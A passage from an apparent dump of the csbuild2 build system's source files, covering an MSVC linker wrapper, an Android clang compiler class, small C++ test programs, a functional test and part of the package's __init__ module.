..common.msvc_tool_base import MsvcToolBase\nfrom ..common.tool_traits import HasDebugLevel, HasIncrementalLink\nfrom ... 
import log\nfrom ..._utils import ordered_set, response_file, shared_globals\n\nDebugLevel = HasDebugLevel.DebugLevel\n\ndef _ignore(_):\n\tpass\n\nclass MsvcLinker(MsvcToolBase, LinkerBase, HasIncrementalLink):\n\t\"\"\"\n\tMSVC linker tool implementation for c++ and asm.\n\t\"\"\"\n\tsupportedPlatforms = { \"Windows\" }\n\tsupportedArchitectures = { \"x86\", \"x64\", \"arm64\" }\n\tinputGroups = { \".obj\", \".o\" }\n\toutputFiles = { \".exe\", \".lib\", \".dll\" }\n\tcrossProjectDependencies = { \".lib\" }\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tMsvcToolBase.__init__(self, projectSettings)\n\t\tLinkerBase.__init__(self, projectSettings)\n\t\tHasIncrementalLink.__init__(self, projectSettings)\n\n\t\tself._libExePath = None\n\t\tself._linkExePath = None\n\n\tdef _getEnv(self, project):\n\t\treturn self.vcvarsall.env\n\n\tdef _getOutputFiles(self, project):\n\t\toutputPath = os.path.join(project.outputDir, project.outputName)\n\t\toutputFiles = {\n\t\t\tcsbuild.ProjectType.Application: [\"{}.exe\".format(outputPath)],\n\t\t\tcsbuild.ProjectType.StaticLibrary: [\"{}.lib\".format(outputPath)],\n\t\t\tcsbuild.ProjectType.SharedLibrary: [\"{}.dll\".format(outputPath)],\n\t\t}[project.projectType]\n\n\t\t# Output files when not building a static library.\n\t\tif project.projectType != csbuild.ProjectType.StaticLibrary:\n\t\t\toutputFiles.append(\"{}.ilk\".format(outputPath))\n\n\t\t\t# Add the PDB file if debugging is enabled.\n\t\t\tif self._debugLevel != DebugLevel.Disabled:\n\t\t\t\toutputFiles.append(\"{}.pdb\".format(outputPath))\n\n\t\t# Can't predict these things, linker will make them if it decides to.\n\t\tpossibleFiles = [\"{}.exp\".format(outputPath), \"{}.lib\".format(outputPath)]\n\t\toutputFiles.extend([filename for filename in possibleFiles if os.access(filename, os.F_OK)])\n\n\t\treturn tuple(set(outputFiles))\n\n\tdef _getCommand(self, project, inputFiles):\n\t\tif project.projectType == csbuild.ProjectType.StaticLibrary:\n\t\t\tcmdExe = self._libExePath\n\t\t\tcmd = self._getDefaultArgs(project) \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles)\n\n\t\telse:\n\t\t\tcmdExe = self._linkExePath\n\t\t\tcmd = self._getDefaultArgs(project) \\\n\t\t\t\t+ self._getIncrementalLinkArgs(project) \\\n\t\t\t\t+ self._getUwpArgs(project) \\\n\t\t\t\t+ self._getCustomArgs() \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles) \\\n\t\t\t\t+ self._getLibraryArgs(project)\n\n\t\t# De-duplicate any repeated items in the command list.\n\t\tcmd = list(ordered_set.OrderedSet(cmd))\n\n\t\tresponseFile = response_file.ResponseFile(project, \"linker-{}\".format(project.outputName), cmd)\n\n\t\tif shared_globals.showCommands:\n\t\t\tlog.Command(\"ResponseFile: {}\\n\\t{}\".format(responseFile.filePath, responseFile.AsString()))\n\n\t\treturn [cmdExe, \"@{}\".format(responseFile.filePath)]\n\n\tdef _findLibraries(self, project, libs):\n\t\tallLibraryDirectories = list(self._libraryDirectories) + self.vcvarsall.libPaths\n\n\t\treturn FindLibraries(libs, allLibraryDirectories, [\".lib\"])\n\n\tdef _getOutputExtension(self, projectType):\n\t\t# These are extensions of the files that can be output from the linker or 
librarian.\n\t\t# The library extensions should represent the file types that can actually linked against.\n\t\text = {\n\t\t\tcsbuild.ProjectType.Application: \".exe\",\n\t\t\tcsbuild.ProjectType.SharedLibrary: \".lib\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \".lib\",\n\t\t}\n\t\treturn ext.get(projectType, None)\n\n\tdef SetupForProject(self, project):\n\t\tMsvcToolBase.SetupForProject(self, project)\n\t\tLinkerBase.SetupForProject(self, project)\n\t\tHasIncrementalLink.SetupForProject(self, project)\n\n\t\tself._libExePath = os.path.join(self.vcvarsall.binPath, \"lib.exe\")\n\t\tself._linkExePath = os.path.join(self.vcvarsall.binPath, \"link.exe\")\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = [\n\t\t\t\"/ERRORREPORT:NONE\",\n\t\t\t\"/NOLOGO\",\n\t\t\t\"/MACHINE:{}\".format(project.architectureName.upper()),\n\t\t]\n\n\t\t# Add the subsystem argument if specified.\n\t\tif self.msvcSubsystem:\n\t\t\tsubsystemArg = [\"/SUBSYSTEM:{}\".format(self.msvcSubsystem)]\n\n\t\t\t# The subsystem version is optional.\n\t\t\tif self.msvcSubsystemVersion:\n\t\t\t\tsubsystemArg.append(\",{}.{}\".format(self.msvcSubsystemVersion[0], self.msvcSubsystemVersion[1]))\n\n\t\t\targs.append(\"\".join(subsystemArg))\n\n\t\t# Arguments for any project that is not a static library.\n\t\tif project.projectType != csbuild.ProjectType.StaticLibrary:\n\t\t\targs.extend([\n\t\t\t\t\"/NXCOMPAT\",\n\t\t\t\t\"/DYNAMICBASE\",\n\t\t\t])\n\t\t\tif self._debugLevel != DebugLevel.Disabled:\n\t\t\t\targs.append(\"/DEBUG\")\n\t\t\tif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\t\targs.append(\"/DLL\")\n\t\treturn args\n\n\tdef _getIncrementalLinkArgs(self, project):\n\t\targs = []\n\n\t\tif project.projectType != csbuild.ProjectType.StaticLibrary and self._incrementalLink:\n\t\t\targs.extend([\n\t\t\t\t\"/INCREMENTAL\",\n\t\t\t\t\"/ILK:{}.ilk\".format(os.path.join(project.outputDir, project.outputName)),\n\t\t\t])\n\n\t\treturn args\n\n\tdef _getUwpArgs(self, project):\n\t\t_ignore(project)\n\t\treturn []\n\n\tdef _getCustomArgs(self):\n\t\t# Eliminate duplicate entries without wrecking the argument order.\n\t\targs = list(ordered_set.OrderedSet(self._linkerFlags))\n\t\treturn args\n\n\tdef _getLibraryArgs(self, project):\n\t\t# Static libraries don't require the default libraries to be linked, so only add them when building an application or shared library.\n\t\targs = [] if project.projectType == csbuild.ProjectType.StaticLibrary else [\n\t\t\t\"kernel32.lib\",\n\t\t\t\"user32.lib\",\n\t\t\t\"gdi32.lib\",\n\t\t\t\"winspool.lib\",\n\t\t\t\"comdlg32.lib\",\n\t\t\t\"advapi32.lib\",\n\t\t\t\"shell32.lib\",\n\t\t\t\"ole32.lib\",\n\t\t\t\"oleaut32.lib\",\n\t\t\t\"uuid.lib\",\n\t\t\t\"odbc32.lib\",\n\t\t\t\"odbccp32.lib\",\n\t\t]\n\t\targs.extend(list(self._actualLibraryLocations.values()))\n\t\treturn args\n\n\tdef _getOutputFileArgs(self, project):\n\t\toutExt = {\n\t\t\tcsbuild.ProjectType.SharedLibrary: \".dll\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \".lib\",\n\t\t}\n\t\toutputPath = os.path.join(project.outputDir, project.outputName)\n\t\targs = [\"/OUT:{}{}\".format(outputPath, outExt.get(project.projectType, \".exe\"))]\n\n\t\tif project.projectType == 
csbuild.ProjectType.SharedLibrary:\n\t\t\targs.append(\"/IMPLIB:{}.lib\".format(outputPath))\n\n\t\tif project.projectType != csbuild.ProjectType.StaticLibrary and self._debugLevel != DebugLevel.Disabled:\n\t\t\targs.append(\"/PDB:{}.pdb\".format(outputPath))\n\n\t\treturn args\n\n\tdef _getInputFileArgs(self, inputFiles):\n\t\treturn [f.filename for f in inputFiles]\n" }, { "alpha_fraction": 0.5882353186607361, "alphanum_fraction": 0.5980392098426819, "avg_line_length": 10.333333015441895, "blob_id": "768ce8df6f3df411cda7aeacedeb9604670a8dfd", "content_id": "0f04350f218d37ac72a9c94c54af1058fc600c05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 102, "license_type": "no_license", "max_line_length": 25, "num_lines": 9, "path": "/functional_tests/cpp_recursive_header_test/hello_world/main.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include \"a.h\"\n#include \"b.h\"\n\nint main()\n{\n\tprintf(\"Hello, World!\");\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.7013225555419922, "alphanum_fraction": 0.7027920484542847, "avg_line_length": 42.20634841918945, "blob_id": "6e24793cb86031f631b2e8529154866ebde00b6e", "content_id": "a086746bafa6f9762067f99a03f25472c96c99fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2722, "license_type": "no_license", "max_line_length": 151, "num_lines": 63, "path": "/csbuild/tools/cpp_compilers/android_clang_cpp_compiler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: android_clang_cpp_compiler\n\t:synopsis: Android clang compiler tool for C++.\n\n.. 
moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom .android_gcc_cpp_compiler import AndroidGccCppCompiler\n\nclass AndroidClangCppCompiler(AndroidGccCppCompiler):\n\t\"\"\"\n\tAndroid clang compiler implementation\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tAndroidGccCppCompiler.__init__(self, projectSettings)\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getComplierName(self, project, isCpp):\n\t\tassert os.access(self._androidInfo.clangPath, os.F_OK), \"No Android clang executable found for architecture: {}\".format(project.architectureName)\n\t\tassert os.access(self._androidInfo.clangppPath, os.F_OK), \"No Android clang++ executable found for architecture: {}\".format(project.architectureName)\n\t\treturn self._androidInfo.clangppPath if isCpp else self._androidInfo.clangPath\n\n\tdef _getDefaultArgs(self, project):\n\t\tbaseArgs = []\n\t\tdefaultAndroidArgs = self._getDefaultCompilerArgs()\n\t\tif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\tbaseArgs.append(\"-fPIC\")\n\t\treturn baseArgs + defaultAndroidArgs + [\n\t\t\t\"-gcc-toolchain\",\n\t\t\tself._androidInfo.gccToolchainRootPath,\n\t\t]\n\n\tdef _getArchitectureArgs(self, project):\n\t\ttargetName = self._getTargetTripleName(project.architectureName)\n\t\treturn [\"-target\", targetName]\n" }, { "alpha_fraction": 0.5537189841270447, "alphanum_fraction": 0.5619834661483765, "avg_line_length": 9, "blob_id": "0e8dadf1da65e0ebdb1d856bef96d3409d61b18c", "content_id": "413d24a876058d6a5dca1bb7fb7bc3b35aa62723", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 121, "license_type": "no_license", "max_line_length": 35, "num_lines": 12, "path": "/functional_tests/basic_asm_test/hello_world/main.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "\n#include <stdio.h>\n\nextern \"C\"\n{\n\textern int getnum();\n}\n\nint main()\n{\n\tprintf(\"getnum() = %d\", getnum());\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6483516693115234, "alphanum_fraction": 0.6483516693115234, "avg_line_length": 12, "blob_id": "33a00a1771f7c3125edb6dcfd6f99b65fdf1bcac", "content_id": "30957f4bd5ba88fa078cdad8ba59ba5f62bf87a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 91, "license_type": "no_license", "max_line_length": 25, "num_lines": 7, "path": "/functional_tests/basic_cpp_test/hello_world/hello.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include \"header.hpp\"\n\nvoid hello_world()\n{\n\tprintf(\"Hello, World!\");\n}\n" }, { "alpha_fraction": 0.7609195113182068, "alphanum_fraction": 0.7627586126327515, "avg_line_length": 38.54545593261719, "blob_id": "8330c2df9935b32352f912fbe538f9360c4d354f", "content_id": "95e390b24fd573a217812dd1ff7bf0278f0f70fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2175, "license_type": "no_license", "max_line_length": 82, "num_lines": 55, "path": "/functional_tests/output_files_sync_after_build_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 
Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Test that files can be executed immediately after being built\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom csbuild._testing.functional_test import FunctionalTest\nfrom csbuild._utils import PlatformBytes\n\nimport os\nimport subprocess\nimport platform\n\nclass OutputFilesSyncAfterBuildTest(FunctionalTest):\n\t\"\"\"Test for accessing output files after being linked.\"\"\"\n\n\t# pylint: disable=invalid-name\n\tdef setUp(self): # pylint: disable=arguments-differ\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.outputFile = \"out/hello_world.exe\"\n\t\telse:\n\t\t\tself.outputFile = \"out/hello_world\"\n\t\tFunctionalTest.setUp(self, cleanArgs=[\"--project=hello_world\"])\n\n\tdef testAccessAfterSyncWorks(self):\n\t\t\"\"\"Test that C++ linker output is accessible immediately after being created.\"\"\"\n\t\tself.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\n\t\tself.assertTrue(os.path.exists(self.outputFile))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, World!\"))\n" }, { "alpha_fraction": 0.7241330146789551, "alphanum_fraction": 0.7273540496826172, "avg_line_length": 32.26309585571289, "blob_id": "a26642cdb4dbe4df903299546b7c790a6a0ae2df", "content_id": "c1b5a2c232f588877e4027001a8d7b793131a066", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27941, "license_type": "no_license", "max_line_length": 178, "num_lines": 840, "path": "/csbuild/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. 
Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: csbuild\n\t:synopsis: cross-platform c/c++ build system\n\n.. moduleauthor:: Jaedyn K. Draper, Zoe J. Bare\n.. attention:: To support CSBuild's operation, Python's import lock is DISABLED once CSBuild has started.\nThis should not be a problem for most makefiles, but if you do any threading within your makefile, take note:\nanything that's imported and used by those threads should always be implemented on the main thread before that\nthread's execution starts. Otherwise, CSBuild does not guarantee that the import will have completed\nonce that thread tries to use it. Long story short: Don't import modules within threads.\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport glob\nimport traceback\n\nfrom . import perf_timer\nfrom ._utils import PlatformUnicode, StrType\n\nwith perf_timer.PerfTimer(\"csbuild module init\"):\n\timport sys\n\timport signal\n\timport os\n\timport platform\n\n\tif sys.version_info[0] >= 3:\n\t\tfrom collections.abc import Callable\n\t\t_typeType = type\n\t\t_classType = type\n\telse:\n\t\tfrom collections import Callable\n\t\timport types\n\t\t# pylint: disable=invalid-name\n\t\t_typeType = types.TypeType\n\t\t_classType = types.ClassType\n\n\tfrom ._utils import shared_globals\n\n\t__author__ = \"Jaedyn K. Draper, Zoe J. Bare\"\n\t__copyright__ = 'Copyright (C) 2012-2014 Jaedyn K. Draper'\n\t__credits__ = [\"Jaedyn K. Draper\", \"Zoe J. Bare\", \"Jeff Grills\", \"Randy Culley\"]\n\t__license__ = 'MIT'\n\n\t__maintainer__ = \"Jaedyn K. 
Draper\"\n\t__email__ = \"[email protected]\"\n\t__status__ = \"Development\"\n\n\t_standardArchName = None\n\n\taddDefaultTargets = True\n\n\ttry:\n\t\twith open(os.path.join(os.path.dirname(__file__), \"version\"), \"r\") as versionFile:\n\t\t\t__version__ = versionFile.read()\n\texcept IOError:\n\t\t__version__ = \"ERR_VERSION_FILE_MISSING\"\n\n\tdef _getElementFromToolchains(selfobj, allToolchains, item):\n\t\tfuncs = set()\n\t\tvals = set()\n\t\thasNonFunc = False\n\t\tfor tempToolchain in allToolchains:\n\t\t\tfound = False\n\t\t\tfor tool in tempToolchain.GetAllTools():\n\t\t\t\tif hasattr(tool, item):\n\t\t\t\t\tcls = None\n\t\t\t\t\tfunc = None\n\t\t\t\t\tfor cls in tool.mro():\n\t\t\t\t\t\tif item in cls.__dict__:\n\t\t\t\t\t\t\tfunc = cls.__dict__[item]\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif not isinstance(func, (Callable, property, staticmethod)) or isinstance(func, (_classType, _typeType)):\n\t\t\t\t\t\thasNonFunc = True\n\t\t\t\t\t\tfuncs.add((None, cls, func))\n\t\t\t\t\t\tvals.add(func)\n\t\t\t\t\telse:\n\t\t\t\t\t\tassert isinstance(func, staticmethod), \"Only static tool methods can be called by makefiles\"\n\t\t\t\t\t\tfuncs.add((tempToolchain, cls, func))\n\t\t\t\t\tfound = True\n\t\t\tif not found and hasattr(tempToolchain, item):\n\t\t\t\tfuncs.add((tempToolchain, None, getattr(tempToolchain, item)))\n\n\t\tif not funcs:\n\t\t\treturn object.__getattribute__(selfobj, item)\n\n\t\tif hasNonFunc:\n\t\t\tif len(funcs) != 1:\n\t\t\t\traise AttributeError(\n\t\t\t\t\t\"Toolchain attribute {} is ambiguous (exists on multiple tools). Try accessing on the class directly, or through toolchain.Tool(class)\".format(item)\n\t\t\t\t)\n\t\t\treturn funcs.pop()[2]\n\n\t\tdef _runFuncs(*args, **kwargs):\n\t\t\trets = []\n\t\t\tfor tempToolchain, tool, func in funcs:\n\t\t\t\tif tool is None:\n\t\t\t\t\trets.append(func(*args, **kwargs))\n\t\t\t\telse:\n\t\t\t\t\twith tempToolchain.Use(tool):\n\t\t\t\t\t\trets.append(func.__get__(tool)(*args, **kwargs))\n\t\t\tif len(rets) == 1:\n\t\t\t\treturn rets[0]\n\t\t\tif len(rets) > 1:\n\t\t\t\treturn MultiDataContext(rets)\n\t\t\treturn None\n\n\t\treturn _runFuncs\n\n\tclass Csbuild(object):\n\t\t\"\"\"\n\t\tClass that represents the actual csbuild module and replaces this module before anything can interact with it.\n\t\tThis is done this way so context managers work - within a context manager, new methods have to become\n\t\taccessible, so there has to be a __getattr__ overload on the module. 
This is the only method by which\n\t\tsuch an overload is possible.\n\n\t\tNote that while this could be considered a \"hack\", it is a hack that's officially endorsed by Guido van Rossum,\n\t\tand the import machinery goes out of its way to intentionally support this behavior.\n\t\t\"\"\"\n\t\tdef __init__(self):\n\t\t\tclass _toolchainMethodResolver(object):\n\t\t\t\tdef __getattribute__(self, item):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tallToolchains = csbuild.currentPlan.GetTempToolchainsInCurrentContexts(*shared_globals.allToolchains)\n\t\t\t\t\texcept NameError:\n\t\t\t\t\t\t# Can and do get here before currentPlan is defined,\n\t\t\t\t\t\t# in which case we don't care because we're not ready to look there anyway,\n\t\t\t\t\t\t# so just go ahead and raise an error.\n\t\t\t\t\t\treturn object.__getattribute__(self, item)\n\t\t\t\t\treturn _getElementFromToolchains(self, allToolchains, item)\n\n\t\t\tself._resolver = _toolchainMethodResolver()\n\t\t\tself._module = sys.modules[\"csbuild\"]\n\n\t\tdef __getattr__(self, name):\n\t\t\tif hasattr(self._module, name):\n\t\t\t\treturn getattr(self._module, name)\n\n\t\t\tif self._resolver is not None:\n\t\t\t\tpreviousResolver = self._resolver\n\t\t\t\tself._resolver = None\n\t\t\t\tif hasattr(previousResolver, name):\n\t\t\t\t\tret = getattr(previousResolver, name)\n\t\t\t\t\tself._resolver = previousResolver\n\t\t\t\t\treturn ret\n\t\t\t\tself._resolver = previousResolver\n\n\t\t\treturn object.__getattribute__(self, name)\n\n\n\tsys.modules[\"csbuild\"] = Csbuild()\n\tcsbuild = sys.modules[\"csbuild\"]\n\n\t# pylint: disable=wrong-import-position\n\tfrom ._build.context_manager import ContextManager, MultiDataContext\n\tfrom ._build import project_plan, project, input_file\n\n\tfrom . import _build, log\n\tfrom ._utils import system\n\tfrom ._utils.string_abc import String\n\tfrom ._utils.decorators import TypeChecked\n\tfrom ._utils import ordered_set\n\tfrom ._utils import PlatformString\n\n\tfrom .toolchain import toolchain\n\n\t#Avoid double init if this module's imported twice for some reason\n\t#Test framework does this because run_unit_tests.py needs to import to get access to RunTests and logging\n\t#and then test discovery ends up importing it again and causing havoc if this block happens twice\n\tif not hasattr(sys.modules[\"csbuild\"], \"currentPlan\"):\n\t\tcsbuild.currentPlan = None # Set to None because ProjectPlan constructor needs to access it.\n\t\tcsbuild.currentPlan = project_plan.ProjectPlan(\"\", \"\", [], 0, False, False, False, os.path.dirname(sys.modules['__main__'].__file__))\n\n\tclass ProjectType(object):\n\t\t\"\"\"\n\t\t'enum' representing the available project types.\n\t\t\"\"\"\n\t\tStub = 0\n\t\tApplication = 1\n\t\tSharedLibrary = 2\n\t\tStaticLibrary = 3\n\n\tclass ScopeDef(object):\n\t\t\"\"\"\n\t\t'enum' representing the types of valid scopes\n\t\t\"\"\"\n\t\tIntermediate = \"intermediate\"\n\t\tFinal = \"final\"\n\t\tChildren = \"children\"\n\t\tAll = \"all\"\n\n\tclass StaticLinkMode( object ):\n\t\t\"\"\"\n\t\t'enum' representing the manner by which to handle static linking\n\t\t\"\"\"\n\t\tLinkLibs = 0\n\t\tLinkIntermediateObjects = 1\n\n\tRunMode = shared_globals.RunMode\n
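\n\t# Editorial note: an illustrative (not executed) makefile snippet using these enums; all names are placeholders:\n\t#\n\t#     csbuild.SetOutput(\"myLib\", csbuild.ProjectType.SharedLibrary)\n\t#     with csbuild.Scope(csbuild.ScopeDef.Final):\n\t#         csbuild.SetUserData(\"note\", \"applies when linking final applications\")\n\n\tclass BuildFailureException(Exception):\n\t\t\"\"\"\n\t\tNotify that a build failed.\n\n\t\t:param buildProject: Project being built\n\t\t:type buildProject: project.Project\n\t\t:param inputFile: The file(s) being built\n\t\t:type inputFile: input_file.InputFile or ordered_set.OrderedSet\n\t\t:param info: Extra details about the 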
failure\n\t\t:type info: str\n\t\t\"\"\"\n\t\t@TypeChecked(buildProject=project.Project, inputFile=(input_file.InputFile, ordered_set.OrderedSet), info=String)\n\t\tdef __init__(self, buildProject, inputFile, info=\"\"):\n\t\t\tException.__init__(self)\n\t\t\tself.project = buildProject\n\t\t\tself.inputFile = inputFile\n\t\t\tself.info = info\n\n\t\tdef __repr__(self):\n\t\t\tret = \"Build for {} in project {} failed!\".format(\n\t\t\t\tself.inputFile,\n\t\t\t\tself.project\n\t\t\t)\n\t\t\tif self.info:\n\t\t\t\tret += \"\\n\\t\" + \"\\n\\t\".join(self.info.splitlines())\n\t\t\treturn ret\n\n\t@TypeChecked(_return=int)\n\tdef GetRunMode():\n\t\t\"\"\"\n\t\tGet information on how csbuild was invoked.\n\n\t\t:return: Run mode class member\n\t\t:rtype: int\n\t\t\"\"\"\n\t\treturn shared_globals.runMode\n\n\t@TypeChecked(_return=StrType)\n\tdef GetSolutionArgs():\n\t\t\"\"\"\n\t\tGet the value passed to the --solution-args option.\n\n\t\t:return: Solution args string.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn shared_globals.solutionArgs\n\n\t@TypeChecked(_return=StrType)\n\tdef GetSolutionPath():\n\t\t\"\"\"\n\t\tGet the root path when generating projects.\n\n\t\t:return: Root solution path.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn shared_globals.solutionPath\n\n\t@TypeChecked(_return=StrType)\n\tdef GetSystemArchitecture():\n\t\t\"\"\"\n\t\tGet the standard name for the architecture of the system currently running csbuild.\n\n\t\t:return: System standard architecture name.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tglobal _standardArchName\n\t\tif _standardArchName is None:\n\t\t\tis64Bit = platform.architecture()[0].lower() == \"64bit\"\n\t\t\tx86Archs = [\"x64\", \"x86_64\", \"amd64\", \"x86\", \"i386\", \"i686\"]\n\t\t\tppcArchs = [\"powerpc\", \"ppc64\"]\n\t\t\tmachine = platform.machine().lower()\n\n\t\t\t# x86 compatible architectures\n\t\t\tif machine in x86Archs:\n\t\t\t\t_standardArchName = \"x64\" if is64Bit else \"x86\"\n\n\t\t\t# ppc architectures\n\t\t\telif machine in ppcArchs:\n\t\t\t\t_standardArchName = \"ppc64\" if is64Bit else \"ppc\"\n\n\t\t\t# arm architectures\n\t\t\telif machine.startswith(\"arm\"):\n\t\t\t\t_standardArchName = \"arm64\" if is64Bit else \"arm\"\n\n\t\t\t# arm 64-bit architecture (special case for some platforms)\n\t\t\telif machine.startswith(\"aarch64\"):\n\t\t\t\t_standardArchName = \"arm64\"\n\n\t\t\t# mips architectures\n\t\t\telif machine.startswith(\"mips\"):\n\t\t\t\t_standardArchName = \"mips64\" if is64Bit else \"mips\"\n\n\t\t\t# sparc architectures\n\t\t\telif machine.startswith(\"sparc\"):\n\t\t\t\t_standardArchName = \"sparc64\" if is64Bit else \"sparc\"\n\n\t\t\t# unknown\n\t\t\telse:\n\t\t\t\t# Architecture type is unknown, so use whatever was returned by platform.machine().\n\t\t\t\t_standardArchName = machine\n\n\t\treturn PlatformUnicode(_standardArchName)\n\n\t@TypeChecked(name=String, projectType=int)\n\tdef SetOutput(name, projectType=ProjectType.Application):\n\t\t\"\"\"\n\t\tSet the project output name and type\n\n\t\t:param name: Project name\n\t\t:type name: str, bytes\n\t\t:param projectType: Type of project\n\t\t:type projectType: ProjectType\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"outputName\", name)\n\t\tcsbuild.currentPlan.SetValue(\"projectType\", projectType)\n\n\t@TypeChecked(name=String, defaultArchitecture=String)\n\tdef RegisterToolchain(name, defaultArchitecture, *tools, **kwargs):\n\t\t\"\"\"\n\t\tRegister a new toolchain to be used by the project for building\n\n\t\t:param name: The name of the toolchain, which will 
